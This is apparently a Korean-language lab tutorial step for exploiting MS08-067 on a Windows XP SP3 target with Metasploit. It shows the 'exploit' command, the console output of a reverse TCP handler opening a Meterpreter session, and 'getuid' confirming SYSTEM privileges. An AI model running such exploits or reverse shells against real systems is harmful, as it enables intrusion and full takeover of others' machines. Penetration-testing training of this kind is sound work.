익스플로잇 실행 및 Meterpreter 세션 확보
모든 옵션을 구성했으므로 이제 익스플로잇을 실행할 준비가 되었습니다. 이것은 대상 시스템을 손상시키려는 마지막 단계입니다.
공격을 시작하려면 exploit 명령을 사용하면 됩니다.
exploit
Metasploit 은 이제 취약점을 익스플로잇하려고 시도합니다. 성공하면 다음과 유사한 출력이 표시됩니다. 대상 OS 를 자동으로 감지하고 익스플로잇을 보낸 다음 페이로드를 보냅니다.
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Automatically detecting the target...
[*] 192.168.1.101:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.101:445 - Selected Target: Windows XP SP3 English (AlwaysOn)
[*] 192.168.1.101:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1035) at 2023-10-27 10:30:00 -0400
meterpreter >
마지막 줄인 Meterpreter session 1 opened에 주목하십시오. 명령 프롬프트가 meterpreter >로 변경되었습니다. 이는 대상 시스템을 성공적으로 손상시켰고 활성 세션을 가지고 있음을 의미합니다.
액세스를 확인하려면 getuid와 같은 명령을 실행하여 대상 시스템에서 어떤 사용자로 실행 중인지 확인하십시오.
getuid
출력은 최고 수준의 권한으로 실행 중임을 보여줍니다.
Server username: NT AUTHORITY\SYSTEM
축하합니다! MS08-067 을 성공적으로 익스플로잇했습니다!